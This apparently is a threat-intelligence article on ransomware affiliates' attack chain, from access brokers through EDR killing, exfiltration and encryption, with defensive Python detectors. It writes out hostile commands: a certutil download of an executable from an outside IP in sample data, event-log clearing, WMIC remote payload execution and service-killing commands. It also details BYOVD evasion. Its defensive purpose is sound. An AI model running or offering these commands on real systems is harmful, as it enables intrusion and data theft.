The RaaS model separates two functions that were once combined in a single criminal group: the operators who build and maintain the platform, and the affiliates who execute the attacks. Operators handle ransomware development, infrastructure, leak sites, payment processing, and negotiation support. Affiliates bring the intrusion skills — target selection, initial access, lateral movement, data exfiltration, and ransomware deployment. They keep 70–85% of each ransom payment. The operator takes the rest.
This division of labor has produced a highly optimized, repeatable attack methodology. Affiliates are not improvising. They are running a structured playbook that has been refined through thousands of successful intrusions, shared through underground forums and affiliate panels, and continuously updated as defensive capabilities evolve. The same techniques appear across unrelated RaaS brands because affiliates move between platforms — and they bring their tradecraft with them.
This article traces the full affiliate attack chain from initial access acquisition through ransom deployment, with specific attention to the techniques, tools, and detection signals at each phase.
Phase 1: Initial Access — How They Get In
Initial access is the one phase affiliates have become increasingly willing to outsource. The ecosystem of Initial Access Brokers — specialists who compromise networks and sell the foothold to others — has grown into a mature, industrialized market that fundamentally changes the economics of ransomware operations.
The Initial Access Broker market
IABs focus exclusively on the hardest part of the attack: getting through the perimeter. Once inside, they establish persistent backdoors, enumerate the environment to assess its value, and then list the access on dark web forums including Exploit, XSS, RAMP, and Breach Forums — or sell it directly to affiliated ransomware operators through private arrangements. The price of access varies based on victim revenue, geography, sector, and the level of privilege obtained. Listings that include domain administrator access command higher prices; routine VPN foothold access has grown cheaper as the market has scaled.
The most significant recent shift is IABs working exclusively for specific RaaS platforms or affiliate groups rather than listing publicly. This direct relationship eliminates the public forum advertising that creates law enforcement visibility, gives the IAB a steady revenue stream, and allows affiliates to move from access procurement to active intrusion with minimal delay. The broker gains access, the affiliate receives it, and the clock starts running on the attack timeline — sometimes within hours of the initial compromise.
IAB access listings have drifted downward in average price as supply has increased. Many mid-sized corporate network footholds now trade for under $1,000 on open forums. High-value targets with domain admin access, large revenue, and critical sectors still command tens of thousands. The low baseline cost means affiliates can acquire and test access across many targets simultaneously, abandoning low-yield environments for better ones — the same model any sales team uses to qualify leads.
Direct initial access techniques
When affiliates or their associated IABs acquire access directly rather than purchasing it, they lean heavily on three primary vectors, in order of documented frequency:
Exposed remote access infrastructure. VPN appliances and RDP services remain the dominant entry point for ransomware affiliates. Specific devices targeted repeatedly in 2024–2025 include Cisco VPN infrastructure (CVE-2020-3259, CVE-2023-20269), SonicWall SMA and SSL VPN devices (CVE-2024-40766), Fortinet FortiGate, and Citrix NetScaler (CVE-2023-3519). These vulnerabilities are often paired with stolen or brute-forced credentials, and frequently exploited where MFA is absent or misconfigured. Affiliates actively monitor newly disclosed vulnerabilities and instrument their tooling to exploit them within days of public disclosure — often before most organizations can patch.
Credential theft and infostealer logs. A substantial portion of initial access in 2025 came not from exploitation but from credential theft — specifically, credentials harvested by infostealer malware (Redline, Vidar, Lumma Stealer, and related families) that infected endpoints through phishing, malvertising, or trojanized software downloads. These stolen credentials, sold in bulk on underground markets or in dedicated Telegram channels, provide VPN credentials, email session tokens, SaaS login pairs, and in some cases local admin passwords that grant direct access to corporate resources. Bitdefender's late 2025 analysis noted a growing shift among ransomware actors toward identity-first compromise — prioritizing credential theft over active exploitation because it is quieter, cheaper, and harder to detect.
Vulnerability exploitation. For high-value targets, affiliates directly exploit public-facing applications — web servers, email gateways, file transfer appliances, and ERP systems. The Oracle EBS zero-day (CVE-2025-61882) and the SharePoint vulnerabilities (CVE-2025-53770, CVE-2025-53771) used in 2025 ransomware campaigns are examples of this pattern. The sophistication required varies widely: some affiliates exploit simple misconfigurations or well-known n-day vulnerabilities against unpatched systems; more capable operators develop or acquire zero-days against enterprise software used by large-revenue targets.
Phase 2: Living Off the Land — Staying Invisible Inside the Network
Once an affiliate has a foothold, their primary operational concern is not moving fast — it is staying hidden. The noisiest part of a ransomware attack, the encryption phase, comes last. Before that, affiliates spend days or weeks mapping the environment, escalating privileges, stealing credentials, and exfiltrating data. All of that work uses, wherever possible, tools that already exist on the system.
Living-off-the-land (LOTL or LOLBins) attacks use legitimate operating system binaries and administrative tools for malicious purposes. PowerShell, Windows Management Instrumentation (WMI), PsExec, Robocopy, certutil, bitsadmin, net, wevtutil, and dozens of others are native to every Windows environment. Because they are trusted by default and generate traffic and logs that look like normal administrative activity, they bypass signature-based detection and do not trigger file-reputation checks. There is no malicious binary to hash. There is no known-bad process to alert on. The attack looks like an administrator doing administrator things.
"Nearly every significant incident we investigate — from ransomware to APTs — leverages living-off-the-land techniques. In ransomware, while attention is often on the final data encryption, the attack's core is a manual hacking operation conducted by affiliates." — Bitdefender TechZone
PowerShell appears in approximately 71% of LOTL attacks in documented telemetry. Its remote execution features, scripting flexibility, and ability to execute code directly in memory without writing files to disk make it the preferred multi-stage attack vehicle. WMI provides lateral movement and persistence mechanisms. certutil.exe and bitsadmin.exe download and execute payloads from remote servers. wevtutil.exe clears event logs. schtasks.exe and sc.exe create persistence through scheduled tasks and services. net.exe enumerates users, groups, and network shares. The combination of these native tools, chained together in sequences that mirror legitimate administrative workflows, allows affiliates to operate extensively inside a compromised environment before any detection mechanism fires.
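The chaining the paragraph above describes is what a detector should score, not any single binary. As an added example (not code from the original article), this Python scorer weights distinct LOLBin techniques per host inside a sliding window; the rule set, the weights and threshold, and the sample process-creation events are all constructed for this illustration.

```python
"""Added example, not code from the original article: score chains of LOLBin
activity per host from constructed process-creation events.

Each record carries the fields a Sysmon Event ID 1 / Security 4688 entry has
(timestamp, host, user, image, command line). The sample data, the rule set
and the weights/threshold are assumptions made for this example."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    image: str
    cmdline: str


# One rule per native tool used the way the article describes. A single hit is
# only informational; the weights are tuned so that a chain crosses the threshold.
LOLBIN_RULES = [
    ("log_clear",  re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I), 5),
    ("cert_fetch", re.compile(r"certutil(\.exe)?.*-urlcache", re.I), 4),
    ("bits_fetch", re.compile(r"bitsadmin(\.exe)?.*/transfer", re.I), 4),
    ("ps_encoded", re.compile(r"powershell.*\s-(e|enc|encodedcommand)\s", re.I), 4),
    ("sched_task", re.compile(r"schtasks(\.exe)?\s+/create", re.I), 3),
    ("svc_create", re.compile(r"\bsc(\.exe)?\s+create\b", re.I), 3),
    ("net_enum",   re.compile(r"\bnet(\.exe)?\s+(user|group|view|localgroup)\b", re.I), 1),
]
WEIGHTS = {name: weight for name, _, weight in LOLBIN_RULES}


def classify(ev):
    """Names of every rule the event's command line matches."""
    return [name for name, rx, _ in LOLBIN_RULES if rx.search(ev.cmdline)]


def score_hosts(events, window=timedelta(minutes=30), threshold=8):
    """Return {host: (score, [techniques])} for hosts whose distinct LOLBin
    techniques inside any sliding window add up to at least the threshold."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(ev.host, []).append(ev)
    alerts = {}
    for host, evs in by_host.items():
        hits = [(ev.ts, name) for ev in evs for name in classify(ev)]
        for i, (start, _) in enumerate(hits):
            techniques = sorted({name for ts, name in hits[i:] if ts - start <= window})
            score = sum(WEIGHTS[t] for t in techniques)
            if score >= threshold and score > alerts.get(host, (0, []))[0]:
                alerts[host] = (score, techniques)
    return alerts


# Constructed sample: an administrator doing routine work on WS-ADMIN01, and a
# service account on SRV-FILE02 running the download / persist / enumerate /
# clear-logs chain the article describes.
T0 = datetime(2025, 11, 3, 2, 14)
SAMPLE = [
    ProcEvent(T0, "WS-ADMIN01", "CORP\\jdoe", "net.exe", "net view \\\\fileserver"),
    ProcEvent(T0 + timedelta(minutes=1), "WS-ADMIN01", "CORP\\jdoe", "schtasks.exe",
              "schtasks /create /tn BackupJob /tr C:\\Tools\\backup.cmd /sc daily"),
    ProcEvent(T0, "SRV-FILE02", "CORP\\svc_backup", "certutil.exe",
              "certutil -urlcache -split -f http://203.0.113.5/u.txt C:\\Users\\Public\\u.exe"),
    ProcEvent(T0 + timedelta(minutes=2), "SRV-FILE02", "CORP\\svc_backup", "schtasks.exe",
              "schtasks /create /tn Updater /tr C:\\Users\\Public\\u.exe /sc onlogon"),
    ProcEvent(T0 + timedelta(minutes=3), "SRV-FILE02", "CORP\\svc_backup", "net.exe",
              'net group "Domain Admins" /domain'),
    ProcEvent(T0 + timedelta(minutes=9), "SRV-FILE02", "CORP\\svc_backup", "wevtutil.exe",
              "wevtutil cl Security"),
]

if __name__ == "__main__":
    for host, (score, techniques) in score_hosts(SAMPLE).items():
        print(f"{host}: score={score} chain={' -> '.join(techniques)}")
```

The administrator's two commands score 4 and stay below the threshold; the same `schtasks /create` on the file server becomes part of a 13-point chain because of what surrounds it.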
Alongside LOTL techniques, affiliates routinely deploy legitimate remote access and administration tools that are commercial off-the-shelf products: AnyDesk, TeamViewer, Splashtop, RustDesk, and similar platforms are installed on compromised systems to provide persistent, easy-to-use remote access that blends with normal IT operations. These tools are particularly useful for affiliates who work with IABs — the IAB may install a remote access tool and hand off the session, allowing the affiliate to take over without ever touching the original compromise vector.
Credential harvesting inside the network
Once inside, one of the first priorities is credential escalation. Affiliates use a combination of techniques depending on what they find:
- Mimikatz and LSASS dumping — extracting plaintext passwords and NTLM hashes from memory. While Mimikatz itself is widely detected, affiliates frequently use modified variants, obfuscated copies, or alternative tools with the same functionality.
- Kerberoasting — requesting service tickets for accounts with Service Principal Names set, then cracking the tickets offline to recover passwords without touching the domain controller directly.
- Pass-the-hash / Pass-the-ticket — using captured NTLM hashes or Kerberos tickets to authenticate to other systems without knowing the actual plaintext password.
- Impacket tools — secretsdump, psexec, wmiexec, and related scripts for remote credential dumping and lateral movement over legitimate protocols.
- Infostealer deployment — dropping commodity infostealers (Vidar, RedLine) inside the network to harvest browser-stored credentials, saved passwords, and session tokens from additional endpoints.
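As an added example (not the article's own code) for the credential-access techniques above, the following Python detector works over constructed Windows Security 4769 records and flags the Kerberoasting pattern: one account requesting RC4 service tickets for many service accounts in a short window. The thresholds and the sample records are assumptions.

```python
"""Added example, not code from the original article: flag Kerberoasting-style
bursts in Windows Security Event 4769 (Kerberos service ticket requested).

A constructed list of 4769 records stands in for a SIEM query result. Keys mirror
the event's own fields: TargetUserName is the requesting account, ServiceName the
account that holds the requested SPN, TicketEncryptionType the ticket cipher.
The window and count thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # RC4 tickets are the offline-crackable kind; 0x11/0x12 are AES


def detect_kerberoast(events, window=timedelta(minutes=5), min_services=5):
    """Return one finding per account that obtained RC4 service tickets for at
    least min_services distinct service accounts inside any sliding window.
    Tickets for krbtgt and for computer accounts (names ending in $) are skipped:
    neither has a human-chosen password worth cracking."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        svc = ev["ServiceName"]
        if ev["TicketEncryptionType"] != RC4_HMAC or svc.startswith("krbtgt") or svc.endswith("$"):
            continue
        by_user[ev["TargetUserName"]].append(ev)
    findings = []
    for user, evs in by_user.items():
        for i, start in enumerate(evs):
            burst = [e for e in evs[i:] if e["ts"] - start["ts"] <= window]
            services = sorted({e["ServiceName"] for e in burst})
            if len(services) >= min_services:
                findings.append({"user": user, "source_ip": start["IpAddress"],
                                 "first_seen": start["ts"], "services": services})
                break  # one finding per account is enough for triage
    return findings


# Constructed sample: jdoe's ordinary AES ticket requests during the day, and a
# service account pulling RC4 tickets for six service accounts within a minute.
T0 = datetime(2025, 11, 3, 2, 41, 0)
TARGET_SERVICES = ["svc_sql01", "svc_sql02", "svc_web", "svc_files", "svc_exchange", "svc_jump"]
SAMPLE_4769 = [
    {"ts": datetime(2025, 11, 3, 9, 0), "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql01", "TicketEncryptionType": 0x12, "IpAddress": "10.0.5.21"},
    {"ts": datetime(2025, 11, 3, 9, 5), "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": 0x12, "IpAddress": "10.0.5.21"},
    {"ts": datetime(2025, 11, 3, 9, 6), "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "FILES01$", "TicketEncryptionType": 0x12, "IpAddress": "10.0.5.21"},
] + [
    {"ts": T0 + timedelta(seconds=10 * i), "TargetUserName": "svc_backup@CORP.LOCAL",
     "ServiceName": svc, "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.9.44"}
    for i, svc in enumerate(TARGET_SERVICES)
]

if __name__ == "__main__":
    for f in detect_kerberoast(SAMPLE_4769):
        print(f"{f['user']} from {f['source_ip']} at {f['first_seen']}: "
              f"{len(f['services'])} service accounts: {', '.join(f['services'])}")
```

Accounts that legitimately still negotiate RC4 (legacy applications) will produce RC4 4769 records routinely; baseline those and exclude them per account rather than raising the threshold for everyone.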
Phase 3: Lateral Movement — Expanding the Foothold
Lateral movement is where the initial foothold becomes an environment-wide compromise. Affiliates typically move toward domain controller access as quickly as possible, because domain administrator credentials allow them to deploy the ransomware payload simultaneously to every machine in the domain via Group Policy or PsExec batch execution.
The primary protocols used for lateral movement are RDP (Remote Desktop Protocol), SMB (Server Message Block), WMI, and PowerShell Remoting — all legitimate administrative channels that generate high volumes of normal traffic in any enterprise environment. Affiliates blend their lateral movement traffic into this background noise, sometimes deliberately mimicking the timing and volume patterns of legitimate administrator activity.
Specific tools consistently observed across affiliate intrusions include PsExec for remote process execution across SMB, Cobalt Strike for post-exploitation command-and-control with beaconing that mimics normal HTTPS traffic, and Impacket's suite of Python tools for SMB and Kerberos-based lateral movement. In environments running VMware ESXi, affiliates increasingly target hypervisor management interfaces directly — encrypting VM disk files on the hypervisor allows simultaneous disabling of hundreds of virtual machines in a single operation, producing maximum disruption with minimal payload deployment effort.
Across multiple investigations, Akira affiliates moved from initial access to domain-level control within hours to a few days. The tight timeline reflects both the efficiency of the LOTL and credential-based lateral movement techniques and the operational pressure affiliates face — extended dwell time increases detection risk and reduces the return on each access. Once domain admin credentials are in hand, the affiliate typically moves quickly toward exfiltration and deployment.
Phase 4: EDR Evasion — Killing the Watchdog Before Detonation
Before the ransomware payload executes, affiliates need to disable or neutralize endpoint detection and response tools. An active EDR agent that catches the encryptor and quarantines it means the affiliate loses the deployment and potentially burns the access. EDR killers — tools specifically designed to disable security software — have become a standard component of every modern ransomware intrusion.
Bring Your Own Vulnerable Driver (BYOVD)
BYOVD is the dominant technique for EDR termination because it operates below the level where EDR self-protection mechanisms can intervene. The attack exploits a fundamental property of Windows: to protect the kernel, Microsoft requires that kernel-mode drivers carry valid digital signatures. But millions of legacy signed drivers contain vulnerabilities. These drivers can be loaded by any local administrator using standard Windows commands — their valid signatures ensure Windows permits it — and their vulnerabilities can then be exploited to gain kernel-level privileges.
From kernel space (Ring 0), the attacker can enumerate and terminate any process on the system, unregister the kernel callbacks that EDR agents use to monitor process creation and file operations, and modify kernel data structures in ways that make EDR agents functionally blind. The EDR software appears to still be running, but it has lost the ability to observe or intercept malicious activity. The encryptor then executes in an environment the EDR can no longer protect.
Documented vulnerable drivers abused in ransomware operations include the RTCore64.sys driver from MSI Afterburner (used by BlackCat affiliates), gaming anti-cheat drivers including mhyprot2.sys from Genshin Impact (packaged alongside multiple ransomware loaders in 2024–2025), and dozens of legitimate hardware utility drivers from motherboard and GPU manufacturers. A public GitHub repository called BlackSnufkin's BYOVD, regularly maintained with PoC implementations for ten vulnerable drivers, is documented as the most frequently used source of driver exploitation code in live ransomware attacks. The Warlock ransomware gang deploys dozens of EDR killers per intrusion until one succeeds — recent samples show code patterns consistent with AI-assisted development, accelerating the creation of new variants.
A significant development in late 2025 and early 2026 is the compression of the BYOVD deployment into a single stage. Previously, affiliates had to first load the vulnerable driver, then execute a separate EDR killer tool — two distinct steps with two detection windows. Newer ransomware families are embedding the vulnerable driver directly within the ransomware payload, so EDR termination and payload execution occur in near-simultaneous operations. The Reynolds ransomware, observed in February 2026, embedded a vulnerable NsecSoft NSecKrnl driver (CVE-2025-68947) directly within the payload, eliminating the separate deployment step entirely.
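The defensive point of BYOVD is that a valid signature proves nothing about a driver's safety. As an added example (not code from the article), this Python triage routine scores driver-load records by blocklist hash, known-abused filename and load path; the hashes are labelled placeholders, the NSecKrnl filename is an assumption, and the sample events are constructed.

```python
"""Added example, not code from the original article: triage driver-load
records (Sysmon Event ID 6 style fields) against a vulnerable-driver blocklist.

Driver names come from the article. The SHA-256 values below are PLACEHOLDERS,
not real hashes; a deployment would load them from a maintained source such as
Microsoft's vulnerable driver blocklist. The NSecKrnl filename is assumed from
the vendor/driver name in the article. Sample events are constructed."""
import ntpath

BLOCKLIST_SHA256 = {  # placeholder hashes -> description
    "PLACEHOLDER_SHA256_RTCORE64": "RTCore64.sys (MSI Afterburner)",
    "PLACEHOLDER_SHA256_MHYPROT2": "mhyprot2.sys (Genshin Impact anti-cheat)",
}
# Name-based signal for copies that were renamed or rebuilt and so changed hash.
KNOWN_ABUSED_NAMES = {"rtcore64.sys", "mhyprot2.sys", "nseckrnl64.sys"}
TRUSTED_DRIVER_DIR = r"c:\windows\system32\drivers"


def triage_driver_load(ev):
    """Return (severity, reasons) for one driver-load record.

    A valid signature is exactly what BYOVD relies on, so 'Signed: true' is not
    evidence of safety; the hash, the name and the load path carry the signal."""
    reasons, severity = [], "info"
    path = ev["ImageLoaded"]
    name = ntpath.basename(path).lower()
    if ev.get("SHA256") in BLOCKLIST_SHA256:
        reasons.append("hash on vulnerable-driver blocklist: " + BLOCKLIST_SHA256[ev["SHA256"]])
        severity = "high"
    elif name in KNOWN_ABUSED_NAMES:
        reasons.append("driver name associated with BYOVD abuse: " + name)
        severity = "high"
    if not path.lower().startswith(TRUSTED_DRIVER_DIR):
        reasons.append("driver loaded from outside the system driver directory: " + path)
        severity = "high" if severity == "high" else "medium"
    if ev.get("Signed") != "true" or ev.get("SignatureStatus") != "Valid":
        # Driver signature enforcement should have refused this load outright.
        reasons.append("signature missing or invalid")
        severity = "high"
    return severity, reasons


SAMPLE_DRIVER_LOADS = [  # constructed
    {"ImageLoaded": r"C:\Windows\System32\drivers\nvlddmkm.sys",
     "SHA256": "PLACEHOLDER_SHA256_NVIDIA", "Signed": "true", "SignatureStatus": "Valid"},
    {"ImageLoaded": r"C:\Users\Public\RTCore64.sys",
     "SHA256": "PLACEHOLDER_SHA256_RTCORE64", "Signed": "true", "SignatureStatus": "Valid"},
    {"ImageLoaded": r"C:\Windows\Temp\upd.sys",
     "SHA256": "PLACEHOLDER_SHA256_UNKNOWN", "Signed": "true", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for ev in SAMPLE_DRIVER_LOADS:
        severity, reasons = triage_driver_load(ev)
        print(f"{severity:6} {ev['ImageLoaded']}  {'; '.join(reasons)}")
```

The third record is the interesting one for the single-stage variant described above: an unknown hash with a clean signature still lands at medium purely because of where it was loaded from.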
Beyond BYOVD: Other EDR killer approaches
BYOVD is not the only EDR killer technique in the affiliate toolkit. ESET researchers have tracked nearly 90 EDR killer tools in active use, reflecting the diversity of approaches affiliates deploy:
- Anti-rootkit abuse — legitimate anti-rootkit utilities that expose kernel-level process termination capabilities are repurposed to kill EDR agents. These tools carry legitimate vendor signatures and may not trigger BYOVD-specific detection rules.
- EDRSilencer and similar driverless tools — instead of terminating the EDR process, these tools block communication between the endpoint agent and its cloud-based security backend. The agent remains running but cannot report detections, receive updates, or trigger automated responses. ESET documented rapid adoption of EDRSilencer by ransomware actors within days of the tool's release.
- EDRKillShifter — a custom EDR killer developed by RansomHub operators and provided to their affiliates as part of the platform tooling. RansomHub is the only documented RaaS platform known to have provided affiliates with a proprietary EDR killer rather than relying on public tools.
- Script-based killers using LOLBins — service stop commands (`sc stop`), process kill commands (`taskkill`), and WMI process deletion (`wmic process where name=… delete`) blended with LOLBin activity to disable security services without triggering BYOVD-specific detection. These are less reliable against hardened agents but remain effective against organizations with weaker security configurations.
Affiliates, not operators, choose their EDR killers. The same driver appears across unrelated tooling, and the same tool migrates between different ransomware brands as affiliates carry their toolkits from one platform to another. This cross-group tooling sharing makes driver-based attribution to specific groups unreliable. If your EDR detects an EDR killer attempt, the relevant information for defensive response is the technique — kernel-assisted driver loading — not which brand's operator presumably distributed the tool.
Phase 5: Data Exfiltration — Stealing Before Encrypting
Double extortion — the combination of ransomware encryption with the threat to publish stolen data — has become the dominant ransomware model. But the order of operations matters: exfiltration happens before encryption in more than 70% of ransomware attacks, according to Huntress's 2025 Cyber Threat Report. Data leaves the network while the organization still has no idea it has been compromised. By the time the ransom note appears, the leverage is already established.
Affiliates stage data for exfiltration by aggregating files of interest — financial records, customer data, employee records, intellectual property — into a collection point inside the network before transferring them externally. Common staging and exfiltration tools observed across affiliate intrusions include:
- Rclone — a legitimate cloud storage sync tool that affiliates configure to send data to attacker-controlled cloud storage accounts (Mega, pCloud, or anonymous S3 buckets). Rclone traffic is encrypted and looks like normal cloud sync activity.
- WinRAR and 7-Zip — for compressing and archiving staged data before exfiltration, often paired with password protection to prevent defenders from easily inspecting the archive if it is detected in transit.
- FileZilla and fzsftp.exe — for SFTP-based exfiltration to attacker servers.
- Ngrok — a tunneling tool that exposes internal services to the internet through encrypted tunnels, bypassing perimeter firewall inspection. Used both for exfiltration and for establishing persistent C2 channels.
- LOLBin exfiltration — native utilities including `bitsadmin.exe` (background file transfers), `robocopy.exe` (bulk file copying to network shares), `ftp.exe`, and even `finger.exe` (documented by Huntress as used to exfiltrate process listings) — all legitimate tools that blend with normal operations.
- Cloud drive abuse — using corporate-authorized cloud platforms (Google Drive, OneDrive, Dropbox) as exfiltration channels, exploiting the fact that traffic to these platforms is typically allowed and encrypted, making content inspection difficult. Crypto24 ransomware operators used Google Drive for this purpose.
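For the bulk-egress detection the tooling list above implies, here is an added Python example (not from the original article) that compares each host's outbound volume today with its own recent baseline and raises severity when one of the staging tools listed above ran on the host or the destination is a cloud storage provider. The thresholds, allowlists and sample telemetry are constructed assumptions.

```python
"""Added example, not code from the original article: flag anomalous bulk egress
by comparing a host's outbound volume today against its own recent baseline and
joining it with process telemetry for the staging tools the article lists.

Inputs are constructed summaries (per-host daily outbound bytes, today's flows by
destination, images executed on each host); the allowlist, domains, multiplier
and floor are assumptions to be tuned per environment."""
from statistics import median

CLOUD_SYNC_DOMAINS = {"mega.nz", "pcloud.com", "amazonaws.com"}
STAGING_TOOLS = {"rclone.exe", "7z.exe", "winrar.exe", "filezilla.exe", "fzsftp.exe", "ngrok.exe"}
ALLOWED_DESTS = {"sharepoint.com", "backup.corp.local"}  # sanctioned bulk destinations


def _matches(name, domains):
    """True when a destination name is one of the domains or a subdomain of one."""
    return any(name == d or name.endswith("." + d) for d in domains)


def flag_egress(daily_bytes, today_flows, processes, multiplier=10, floor_bytes=2_000_000_000):
    """daily_bytes: {host: [outbound bytes on each prior day]}
    today_flows:  [{"host", "dest", "bytes"}]
    processes:    {host: set of image names seen today}
    Returns a list of findings; severity is raised to high when a staging tool
    ran on the host or an unsanctioned destination is a cloud storage provider."""
    flows_by_host = {}
    for f in today_flows:
        flows_by_host.setdefault(f["host"], []).append(f)
    findings = []
    for host, flows in flows_by_host.items():
        baseline = median(daily_bytes.get(host, [0])) or 1  # avoid divide-by-zero
        total = sum(f["bytes"] for f in flows)
        unsanctioned = [f for f in flows if not _matches(f["dest"], ALLOWED_DESTS)]
        if total < floor_bytes or total / baseline < multiplier or not unsanctioned:
            continue
        tools = sorted(STAGING_TOOLS & processes.get(host, set()))
        cloud = any(_matches(f["dest"], CLOUD_SYNC_DOMAINS) for f in unsanctioned)
        findings.append({
            "host": host, "ratio": round(total / baseline, 1),
            "dests": sorted({f["dest"] for f in unsanctioned}),
            "staging_tools": tools,
            "severity": "high" if tools or cloud else "medium",
        })
    return findings


MB = 1_000_000
DAILY = {  # constructed: five prior days of outbound bytes per host
    "SRV-FILE02": [150 * MB, 120 * MB, 180 * MB, 140 * MB, 160 * MB],
    "WS-ADMIN01": [400 * MB, 450 * MB, 420 * MB, 500 * MB, 380 * MB],
    "WS-DEV03":   [900 * MB, 1100 * MB, 950 * MB, 1000 * MB, 1200 * MB],
}
TODAY = [  # constructed
    {"host": "SRV-FILE02", "dest": "g.api.mega.nz", "bytes": 4200 * MB},
    {"host": "SRV-FILE02", "dest": "corp.sharepoint.com", "bytes": 100 * MB},
    {"host": "WS-ADMIN01", "dest": "backup.corp.local", "bytes": 6000 * MB},
    {"host": "WS-DEV03",   "dest": "github.com", "bytes": 2500 * MB},
]
PROCESSES = {  # constructed
    "SRV-FILE02": {"explorer.exe", "7z.exe", "rclone.exe"},
    "WS-ADMIN01": {"explorer.exe", "robocopy.exe"},
    "WS-DEV03":   {"git.exe", "code.exe"},
}

if __name__ == "__main__":
    for f in flag_egress(DAILY, TODAY, PROCESSES):
        print(f"{f['severity']:6} {f['host']} {f['ratio']}x baseline -> "
              f"{f['dests']} tools={f['staging_tools']}")
```

The backup host moves more data than the file server but only to a sanctioned destination, so it stays silent; the file server is flagged high on volume, destination and tooling together.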
The shift toward data-only extortion — where affiliates exfiltrate data and demand payment without ever deploying encryption — represents an evolution away from the most detectable phase of the attack. If the encryptor never runs, there is no encryption event to detect, no sudden file modification storm, and no ransomware note. The organization discovers the breach only when the extortion email arrives or when the data appears on a leak site. Backup strategies that defend against encryption do nothing to address this model.
Phase 6: Ransomware Deployment — The Finale
By the time the affiliate deploys the ransomware encryptor, they have typically completed all preparatory work: perimeter foothold established, domain admin credentials obtained, EDR killed or blinded, backup infrastructure targeted, and valuable data exfiltrated. The encryption phase is designed to be rapid and simultaneous across as many systems as possible, maximizing operational disruption before the organization can respond.
Ransomware is deployed in several ways depending on the environment and the level of access obtained:
- Group Policy Object (GPO) deployment — using domain admin access to push the ransomware payload to all domain-joined machines simultaneously via Group Policy. This is the highest-impact deployment method and the reason affiliates prioritize domain admin access above all other escalation targets.
- PsExec batch execution — running the ransomware binary on a list of target hosts via PsExec over SMB. Slower than GPO but achievable with lower privilege levels and useful for targeting specific high-value systems.
- VMware ESXi direct targeting — affiliates with access to ESXi hypervisor management interfaces execute the Linux or ESXi-specific ransomware variant to encrypt VM disk files (`.vmdk`, `.vmx`) directly on the hypervisor. This can take down hundreds of VMs in a single operation without ever touching the guest operating systems.
- WMIC remote execution — `wmic /node:TARGET process call create "payload.exe"` allows remote execution using captured credentials, leaving limited forensic artifacts compared to PsExec.
Modern ransomware payloads are increasingly cross-platform, with separate builds for Windows, Linux, and ESXi environments reflecting the mixed infrastructure of enterprise targets. LockBit 5.0, released September 2025, introduced dedicated payloads for all three platforms, with enhanced defense evasion and encryption routines built on XChaCha20 and Curve25519. Payloads are typically compiled per victim to change hashes, reducing the effectiveness of hash-based IOC lists.
What This Means for Defenders
Understanding the affiliate playbook as a sequential chain — rather than as a collection of independent threats — changes what defensive investments matter most and when they need to intercept the attack.
The most important insight from documented affiliate tradecraft is that the encryption event is the last thing that happens, not the first thing to defend against. Organizations whose primary defensive strategy centers on detecting or recovering from ransomware encryption have already ceded the most consequential phase of the attack — data exfiltration — to the affiliate. By the time encryption fires, the extortion leverage is already established regardless of whether the backup strategy succeeds.
The highest-value defensive interventions occur earlier in the chain:
At initial access: Enforce phishing-resistant MFA on all VPN, RDP, and remote access infrastructure; a stolen password that cannot satisfy phishing-resistant MFA is not a foothold an IAB can sell. Maintain an aggressive patch cadence for perimeter devices. Monitor for credential leaks in infostealer logs (many services exist to alert on corporate credential exposure in underground markets). Treat any authentication from an unusual IP address, geographic location, or device fingerprint as a priority investigation, not a low-priority alert.
At credential theft and lateral movement: Baseline and monitor Kerberos ticket issuance and service account authentication. Alert on traffic patterns characteristic of Impacket tooling and on secretsdump-style behavior. Restrict lateral movement protocols: block SMB and RDP between workstations that have no business need to communicate directly. Monitor for new scheduled tasks and services created outside of change management windows. Enable PowerShell Script Block Logging and Constrained Language Mode to increase detection coverage of LOLBin abuse.
At EDR evasion: Treat an EDR killer attempt as a highest-priority incident indicator, not as an isolated alert. If an affiliate is attempting to blind your EDR, ransomware deployment is likely minutes away. Enable Hypervisor-protected Code Integrity (HVCI) to block vulnerable driver loading where compatible hardware allows. Monitor for unexpected driver load events and maintain updated vulnerable driver blocklists. Validate that EDR tamper protection is active and that agents cannot be stopped by local administrator commands.
At exfiltration: Detect anomalous bulk data movement — large volumes of file copy operations, unusual Rclone or cloud sync activity, archive tool usage outside of normal business patterns, and outbound connections to unfamiliar endpoints. Data Loss Prevention controls on sensitive data categories provide an additional layer of detection. Network egress monitoring catches what endpoint tools miss when an affiliate uses legitimate cloud platforms as exfiltration channels.
The affiliate playbook is deliberately built around techniques that look like legitimate administrative activity at each individual step. PowerShell execution, WMI queries, RDP connections, cloud sync, scheduled task creation — all of these happen constantly in well-managed environments. Detection requires behavioral baselining and anomaly detection, not signature matching. The question is never "is this tool malicious?" It is always "is this the right tool used in the right way by the right account at the right time?"
The Affiliate Playbook: Phase Reference
| Phase | Common Tools & Techniques | MITRE ATT&CK | Key Detection Signal |
|---|---|---|---|
| Initial Access | VPN/RDP exploitation, IAB-purchased access, infostealer credentials, phishing | T1190, T1078, T1566 | Auth from unexpected location / device; credential in infostealer feed; VPN auth without MFA |
| Persistence | Scheduled tasks, services, RMM tools (AnyDesk, TeamViewer), registry run keys | T1053, T1543, T1547 | New scheduled task / service outside change window; unexpected RMM install; registry modification |
| Credential Access | Mimikatz / LSASS dump, Kerberoasting, secretsdump, infostealers, pass-the-hash | T1003, T1558.003, T1550.002 | LSASS access by non-system process; anomalous SPN ticket requests; secretsdump traffic pattern |
| Discovery | net.exe, nltest, PowerShell AD modules, BloodHound, ADRecon | T1018, T1069, T1087 | Burst of AD enumeration commands; BloodHound collection activity; unusual domain controller queries |
| Lateral Movement | PsExec, WMI, Impacket, RDP, Cobalt Strike, PowerShell Remoting | T1021, T1047, T1570 | Workstation-to-workstation SMB/RDP; PsExec from unusual source; anomalous WMI remote execution |
